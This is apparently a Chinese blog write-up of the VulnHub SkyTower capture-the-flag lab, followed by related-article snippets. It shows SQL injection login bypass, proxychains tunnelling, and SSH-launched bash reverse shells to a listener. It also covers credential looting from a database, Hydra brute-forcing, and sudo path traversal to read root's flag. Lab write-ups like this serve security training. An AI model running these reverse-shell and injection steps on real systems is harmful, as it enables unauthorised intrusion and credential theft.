Skytower

最新推荐文章于 2024-10-04 21:13:01 发布

蓝天模糊

最新推荐文章于 2024-10-04 21:13:01 发布

阅读量240

点赞数 3

文章标签：安全

本文链接：https://blog.csdn.net/weixin_53626662/article/details/140857244

版权

一、主机发现

二、渗透

1.首页有sql注入漏洞

抓包改包

2.到首页抓包改包放包得到

翻译

3.但是22端口被过滤了，所以需要代理，进行端口转发，输入语句下载代理工具

apt install proxychains

文件下载在/etc下

输入命令编辑文件

vim proxychains4.conf

输入语句

proxychains nmap -PN 192.168.x.x -p22 --min-rate 3000 -sT

proxychains ssh john@192.168.x.x

4.执行反弹语句，直接在ssh连接时执行

proxychains ssh john@192.168.x.x "sh -i >& /dev/tcp/192.168.x.x/4444 0>&1"

kali开启监听

nc -lvvp 4444

监听成功

三、提权

1.查看文件

cd  /var/www
ls-al
cat login.php

2.查看数据库信息

发现数据库账号密码为root/root
进行数据库链接  mysql -u root -p
查看数据库 show databases； use  SkyTech
查看数据标 show tables；
查看表中数据 select * from login；

3.将密码保存，使用九头蛇爆破

爆出密码

4.使用sara 在连接ssh时执行反弹语句

proxychains ssh sara@192.168.x.x"sh -i >& /dev/tcp/192.168.x.x/8080 0>&1"
mv .bashrc  .bashrc.bak

kali开启监听

5.监听成功后查看文件，有flag文件

sudo /bin/ls /accounts/ ../../root

6.查看文件，发现密码

sudo /bin/cat /accounts/ ../../root/flag.txt

7.切换root用户，并输入刚刚爆出的密码，提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

蓝天模糊

关注关注

3
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

vuluhub-skytower-1渗透靶场SkyTower 1

ccccai22的博客

08-04

268

vuluhub-skytower-1渗透靶场SkyTower 1提权

SkyTower

幻影狐的博客

09-14

271

利用用户进行远程连接，但是发现连接失败了，前面有一个 3128 端口，是 squid-http 代理。查看到 root 目录下有一个 flag.txt 文件，查看后发现了 root 用户的密码。看到了 /accounts/* 可以利用这个目录去查看 /root 目录。在 SkyTech 库 login 表中找到了一下用户的邮箱和密码。找到了 mysql 数据库的用户名和密码，登录一下 mysql。email=1'||1#，发现好像是成功了，尝试登录。发现了 john 用户和用户的密码。

参与评论您还未登录，请先登录后发表或查看评论

SkyTower靶机

m0_61995767的博客

07-30

1770

KeyTower打靶记录

skytower靶机

weixin_74232792的博客

07-31

302

用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/，发现有个flag文件，查看一下，有root用户的密码，直接切换root，成功提权。发现在accounts目录下有root权限，用以下命令查看shadow文件，cat /accounts/../etc/shadow。转换其他思路，想到刚才扫到了一个代理端口，并且开放了ssh，尝试用这个账号密码连接一下。切换从数据库中发现的其他用户，Sara用户是可以ssh连接的，另外一个不行。

vulnhub靶场SkyTower靶场

zzzzzzkeai的博客

12-08

583

vulnhub靶场--SkyTower靶场

SkyTower靶机复现

weixin_52956666的博客

07-31

510

发现ssh登陆失败，扫描端口的时候22端口状态不是open，但是3128端口开放，是http-proxy是代理端口。因为有后台，所以数据库大概率有账号密码，cat /var/www/login.php。将网卡模式设置为仅主机模式，混杂模式设置为全部允许，并记录MAC地址。加入 ' || 1=1#进行闭合，发现闭合成功，并且爆出了账号密码。同理，vim /etc/proxychains4.conf 也一样。尝试构造sql注入，发现有报错回显，说明存在sql注入。点击注册，将靶机资源加入进入，点击启动。

SKYTOWER: 1超详细靶机实战

weixin_68615160的博客

07-31

482

下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox，这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑，选中后下一步更改路径，然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机，更改为nat模式。

SkyTower 靶机 - 详细流程

m0_73983897的博客

09-20

1065

流程：主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升 web渗透：在发现SQL注入后，首先尝试的便是Sqlmap利用，但无果，原因是数据库拒绝了外部连接；设置代理访问这块，提示的很明显，毕竟在网页上直接写着....proxychains ssh john@192.168.142.145 -t "命令"通过ssh的-t参数执行命令，算比较少见的，这里也可以执行系统命令，反弹shell等权限提升：期间也有直接利用cat包含。

SkyTower靶机渗透测试

weixin_58786230的博客

07-31

317

【代码】SkyTower靶机渗透测试。

小白的靶机VulnHub-SkyTower

wo41ge的博客

12-28

470

靶机地址：https://www.vulnhub.com/entry/skytower-1,96/ 开机界面就是个这同样是使用桥接找到了此次CTF目标计算机IP地址：192.168.56.101 开放了22（filtered）、80、3128代理端口…盒子都有代理… 先访问网页试试这边直接进行测试发现是可以sql注入的得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录发现是不可以的但是根据nmap扫出的结果它是开了代

和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)

冬萍子癸水

04-06

3181

每台都做一做,然后记录在博客里.供自己和大家一起学习.

.888勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复

数据恢复研究℃

10-01

780

引言在数字化时代，网络空间的威胁日益增多，其中勒索病毒已成为数据安全领域的一大挑战。近期，.888勒索病毒作为一种新型的恶意软件，正逐渐引起人们的广泛关注。本文将详细介绍.888勒索病毒的特点、如何恢复被其加密的数据文件，以及预防该病毒的有效策略。.888勒索病毒不断更新和变异的特点，是其能够持续威胁网络安全的重要因素。

【蚂蚁HR-注册/登录安全分析报告】

09-28

1277

蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站，主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市，目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化，创始人团队致力于通过程序和硬件替代所有可以自动化的环节，从而最大限度地减少人为错误，作为头部的社保代缴平台，技术实力也应该不错，但采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。

什么是托管安全信息和事件管理 SIEM？

网络研究观

09-28

1866

SIEM 解决方案是组织网络安全基础设施的重要组成部分

Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员，用于构建安全的 Java 应用程序。

weixin_64446270的博客

09-27

1507

Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员，用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务，从基本的登录认证到复杂的访问控制，几乎涵盖了所有与安全相关的需求。

【隐私计算篇】多方安全计算之函数秘密共享(FSS)

最新发布

源泉的小广场

10-04

637

fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS

安全服务面试

m0_74402888的博客

09-28

779

内网的计算机可向 Internet 上的其他计算机发送连接请求，但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理，还是要从 TCP 连接建立的过程开始说起：大家都知道，TCP 与。的 IP 地址，如果攻击者以数万/秒的速度发送 SYN 报文，同时利用 SOCK_RAW。Internet 上的计算机，但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT（网络地址转换）协议，通过一个公共的网关访问 Internet。

等保测评：企业数字安全的坚实盾牌

w13359990065的博客

09-30

1749

据权威机构统计，未通过等保测评的企业在遭遇网络安全事件时，其数据泄露风险高出已通过企业近30%，这不仅直接威胁到企业的核心资产安全，还可能导致品牌信誉的严重受损。以某知名电商企业为例，因忽视等保测评，其支付系统曾遭受黑客攻击，导致大量用户信息泄露，最终不仅面临巨额罚款，还失去了大量客户的信任，市场份额一落千丈。以某知名电商企业为例，其在一次等保测评中发现，其支付系统存在一处严重的SQL注入漏洞，该漏洞允许攻击者通过构造特定的输入参数，绕过系统验证，直接访问数据库，进而获取敏感信息。

从《GTA5》的反外挂斗争看网络安全的重要性

@云安全小杜

09-26

863

本文将探讨《GTA5》在对抗外挂过程中遇到的挑战，特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击，并从中提炼出对于网络安全的一些启示。然而，随着游戏人气的增长，一些不法分子开始利用技术手段制作并销售外挂程序，这些程序可以让使用者在游戏中获得不公平的优势，从而破坏了游戏环境。请注意，以上内容是基于假设的情景编写的技术分析文章，实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们，在享受数字世界带来的便利的同时，也需要时刻警惕潜在的安全风险，并积极采取措施加以防范。